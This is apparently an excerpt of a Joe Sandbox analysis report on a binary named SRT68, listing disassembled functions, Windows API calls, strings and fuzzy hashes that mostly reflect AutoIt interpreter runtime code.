                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 1212759294-1154884017
                                                                      • Opcode ID: a1cfe9969c4fd18691c8b2422453f320c7c01688ddf2400fab1f7e88f3466f46
                                                                      • Instruction ID: f4c6298fcac7a0ee133e842943daf9e8f11c819c038c2702579c947b01983f89
                                                                      • Opcode Fuzzy Hash: a1cfe9969c4fd18691c8b2422453f320c7c01688ddf2400fab1f7e88f3466f46
                                                                      • Instruction Fuzzy Hash: 72610171A00226BEEB24DF68CD41FBE7BB8FB08710F10415AF955D60C1DBB99A80D7A0
                                                                      APIs
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0100A3CB
                                                                      • GetDriveTypeW.KERNEL32 ref: 0100A418
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A460
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A497
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A4C5
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 2698844021-4113822522
                                                                      • Opcode ID: e2d8fd24ae51a81888ece7767b7f130fc1cc5011e36eed964a1d182b15f6d5c8
                                                                      • Instruction ID: 9435004e647be50d3f50ec2f71fed8ca613d0cb73bdca316e4397df2ad22becb
                                                                      • Opcode Fuzzy Hash: e2d8fd24ae51a81888ece7767b7f130fc1cc5011e36eed964a1d182b15f6d5c8
                                                                      • Instruction Fuzzy Hash: CD5158B52083059FD740EF25CC81C6BB7E4EF89758F40886DF89657291DB39AD0ACB52
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00FDE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00FFF8DF
                                                                      • LoadStringW.USER32(00000000,?,00FDE029,00000001), ref: 00FFF8E8
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • GetModuleHandleW.KERNEL32(00000000,01065310,?,00000FFF,?,?,00FDE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00FFF90A
                                                                      • LoadStringW.USER32(00000000,?,00FDE029,00000001), ref: 00FFF90D
                                                                      • __swprintf.LIBCMT ref: 00FFF95D
                                                                      • __swprintf.LIBCMT ref: 00FFF96E
                                                                      • _wprintf.LIBCMT ref: 00FFFA17
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FFFA2E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 984253442-2268648507
                                                                      • Opcode ID: 68bf985a9297f7ac439eeac1cbef5f1b4a4d303da2cfac96d122b1f06d734552
                                                                      • Instruction ID: 5bf6d4a4bfdd4942583570344cb57abc2cf1407992f0dc545256fdeb2f723ee0
                                                                      • Opcode Fuzzy Hash: 68bf985a9297f7ac439eeac1cbef5f1b4a4d303da2cfac96d122b1f06d734552
                                                                      • Instruction Fuzzy Hash: 8C4141B280020DAACF14FBE1DD46EFE7778AF19750F500065F505B60A6EA395F09EB61
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,01029207,?,?), ref: 0102BA56
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA6D
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA78
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA85
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0102BA8E
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA9D
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0102BAA6
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BAAD
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BABE
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,01032CAC,?), ref: 0102BAD7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0102BAE7
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0102BB0B
                                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0102BB36
                                                                      • DeleteObject.GDI32(00000000), ref: 0102BB5E
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0102BB74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: 04cc988f9ae39c0626d09035e5536cc252ab3677eda1e7f9bf49655f6ed5fb6f
                                                                      • Instruction ID: 36033b594e037670671f26d11816b3aa2419514da74af7cd98395fa28b11baad
                                                                      • Opcode Fuzzy Hash: 04cc988f9ae39c0626d09035e5536cc252ab3677eda1e7f9bf49655f6ed5fb6f
                                                                      • Instruction Fuzzy Hash: 7C414975600219AFDB319F69DC88EAABBBCFF8AB51F208058F985D7254C7759901CB20
                                                                      APIs
                                                                      • __wsplitpath.LIBCMT ref: 0100DA10
                                                                      • _wcscat.LIBCMT ref: 0100DA28
                                                                      • _wcscat.LIBCMT ref: 0100DA3A
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0100DA4F
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0100DA63
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0100DA7B
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0100DA95
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0100DAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                      • String ID: *.*
                                                                      • API String ID: 34673085-438819550
                                                                      • Opcode ID: 5133096c73bb394d2cefa7c789d6c249250ecd8aacc8c712686368bba354b8ce
                                                                      • Instruction ID: fe8c4ef83098e063d4bd0160d329f1010063ef6e6c27cefd1c17a0c3facb2501
                                                                      • Opcode Fuzzy Hash: 5133096c73bb394d2cefa7c789d6c249250ecd8aacc8c712686368bba354b8ce
                                                                      • Instruction Fuzzy Hash: C881B4715083419FEB65DFE8C840A6EB7E5BF89310F18486EF9C9C7291EA34D944CB62
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0102C1FC
                                                                      • GetFocus.USER32 ref: 0102C20C
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0102C217
                                                                      • _memset.LIBCMT ref: 0102C342
                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0102C36D
                                                                      • GetMenuItemCount.USER32(?), ref: 0102C38D
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0102C3A0
                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0102C3D4
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0102C41C
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0102C454
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0102C489
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1296962147-4108050209
                                                                      • Opcode ID: 271cc5f794cbd2df047d094cb4d0ab6f55a8ec172b6d3eec22c367508f314ae1
                                                                      • Instruction ID: 0d61fff6ad76c9139b661fa4f894d31c0b43b5ffd0f828d7fb1c9d76b8b1b5c5
                                                                      • Opcode Fuzzy Hash: 271cc5f794cbd2df047d094cb4d0ab6f55a8ec172b6d3eec22c367508f314ae1
                                                                      • Instruction Fuzzy Hash: EB81A0702083219FE721CF18CA84A6FBBE8FB89354F10495EFAC597251CB35D905CB52
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 0101738F
                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0101739B
                                                                      • CreateCompatibleDC.GDI32(?), ref: 010173A7
                                                                      • SelectObject.GDI32(00000000,?), ref: 010173B4
                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01017408
                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01017444
                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01017468
                                                                      • SelectObject.GDI32(00000006,?), ref: 01017470
                                                                      • DeleteObject.GDI32(?), ref: 01017479
                                                                      • DeleteDC.GDI32(00000006), ref: 01017480
                                                                      • ReleaseDC.USER32(00000000,?), ref: 0101748B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID: (
                                                                      • API String ID: 2598888154-3887548279
                                                                      • Opcode ID: 8207a10afca8fed90fe8128e12b8325e26b7b8dbf234afc6b0ed398fb9e623bd
                                                                      • Instruction ID: 99f1ccfde12f5bb7b14fe2fbe3a002fc6d4749c569d77a8adc0371bc1455b305
                                                                      • Opcode Fuzzy Hash: 8207a10afca8fed90fe8128e12b8325e26b7b8dbf234afc6b0ed398fb9e623bd
                                                                      • Instruction Fuzzy Hash: 46514C7590030AEFDB25CFA8C885EAEBBF9EF48350F14851DF99A97214C739A940CB50
                                                                      APIs
                                                                        • Part of subcall function 00FC0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FA6B0C,?,00008000), ref: 00FC0973
                                                                        • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA6BAD
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA6CFA
                                                                        • Part of subcall function 00FA586D: _wcscpy.LIBCMT ref: 00FA58A5
                                                                        • Part of subcall function 00FC363D: _iswctype.LIBCMT ref: 00FC3645
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 537147316-1018226102
                                                                      • Opcode ID: e9a990aeaa7b9380705f4a1c27611f4bd11aeba9251cc9bc78c3c0302ebe165b
                                                                      • Instruction ID: 77bfcd2909d3f3373090ba36955edf52ee3717405e4775e2c52d2d6449b24502
                                                                      • Opcode Fuzzy Hash: e9a990aeaa7b9380705f4a1c27611f4bd11aeba9251cc9bc78c3c0302ebe165b
                                                                      • Instruction Fuzzy Hash: 4D02CFB15083419FC724EF20C881AAFBBE6EF96354F08481EF4D5972A1DB34D949EB42
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 01002D50
                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 01002DDD
                                                                      • GetMenuItemCount.USER32(01065890), ref: 01002E66
                                                                      • DeleteMenu.USER32(01065890,00000005,00000000,000000F5,?,?), ref: 01002EF6
                                                                      • DeleteMenu.USER32(01065890,00000004,00000000), ref: 01002EFE
                                                                      • DeleteMenu.USER32(01065890,00000006,00000000), ref: 01002F06
                                                                      • DeleteMenu.USER32(01065890,00000003,00000000), ref: 01002F0E
                                                                      • GetMenuItemCount.USER32(01065890), ref: 01002F16
                                                                      • SetMenuItemInfoW.USER32(01065890,00000004,00000000,00000030), ref: 01002F4C
                                                                      • GetCursorPos.USER32(?), ref: 01002F56
                                                                      • SetForegroundWindow.USER32(00000000), ref: 01002F5F
                                                                      • TrackPopupMenuEx.USER32(01065890,00000000,?,00000000,00000000,00000000), ref: 01002F72
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01002F7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                      • String ID:
                                                                      • API String ID: 3993528054-0
                                                                      • Opcode ID: 8a227070da320674f98d453303ec808478c2a2d0f5501108e4b291002e6aa62f
                                                                      • Instruction ID: 1751d5de09600351846814ec7b5265791dc5034c603d802415cfe5c1d3a38ad5
                                                                      • Opcode Fuzzy Hash: 8a227070da320674f98d453303ec808478c2a2d0f5501108e4b291002e6aa62f
                                                                      • Instruction Fuzzy Hash: 7371D470640256BAFB329F58DC8DFAABFA8FF04754F10025AF695AA1D0C7B55C20C790
                                                                      APIs
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      • _memset.LIBCMT ref: 00FF786B
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FF78A0
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FF78BC
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FF78D8
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FF7902
                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FF792A
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FF7935
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FF793A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 1411258926-22481851
                                                                      • Opcode ID: 4041b2683828e0368eb994c1efc59082facd2f2b403a367a556863b3962b9dd2
                                                                      • Instruction ID: aae9560a9fbd9076c5affa744b3ae3a3cf39dc3110e7427097570d3e0254044d
                                                                      • Opcode Fuzzy Hash: 4041b2683828e0368eb994c1efc59082facd2f2b403a367a556863b3962b9dd2
                                                                      • Instruction Fuzzy Hash: 2E4108B2C1422DABCF21EFA4EC85DEEB778BF08750F404069F905A7261DA799D04DB90
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 3964851224-909552448
                                                                      • Opcode ID: 5965779acc915bab2dbc9d6a43d37e564593fea6d7a2d49ecf11a1c3d27dbc91
                                                                      • Instruction ID: 5e6d77a9e29a23603adb38883e6db7354a579b1fd1137346ea5b9190e61ac068
                                                                      • Opcode Fuzzy Hash: 5965779acc915bab2dbc9d6a43d37e564593fea6d7a2d49ecf11a1c3d27dbc91
                                                                      • Instruction Fuzzy Hash: 9541583114435ACBCF81EE14DD56EEF3BA4BF01304F444448FCA51B696DB39996ADBA0
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FDE2A0,00000010,?,Bad directive syntax error,0102F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FFF7C2
                                                                      • LoadStringW.USER32(00000000,?,00FDE2A0,00000010), ref: 00FFF7C9
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • _wprintf.LIBCMT ref: 00FFF7FC
                                                                      • __swprintf.LIBCMT ref: 00FFF81E
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FFF88D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 1506413516-4153970271
                                                                      • Opcode ID: 0b86e51dc7f5e35ecfdcc16d1f09397fb7a7718f4037585abc9c42d42f2bc8ac
                                                                      • Instruction ID: a1755a21311429ab1609e4c0fb4e5fea8d60aa9b83af68460324ff83779f6fd9
                                                                      • Opcode Fuzzy Hash: 0b86e51dc7f5e35ecfdcc16d1f09397fb7a7718f4037585abc9c42d42f2bc8ac
                                                                      • Instruction Fuzzy Hash: 9121717290021EABCF11EF91CC4AEFE7739BF18350F04446AF90566162DA759618EB51
                                                                      APIs
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                        • Part of subcall function 00FA7924: _memmove.LIBCMT ref: 00FA79AD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 01005330
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01005346
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01005357
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01005369
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0100537A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_memmove
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2279737902-1007645807
                                                                      • Opcode ID: 75e08b4b808ac35a330d9fa97b07dea1653111842b83113f365cafb9bfc7bfc2
                                                                      • Instruction ID: 297a5f32984bc6aa0e8531726822f32ea4a9e7487e665194bb13057491410009
                                                                      • Opcode Fuzzy Hash: 75e08b4b808ac35a330d9fa97b07dea1653111842b83113f365cafb9bfc7bfc2
                                                                      • Instruction Fuzzy Hash: D211C8B1A5421D79E760B667DC49DFF7BBCFB9AB40F40445ABC41960D1DAA04904C9B0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
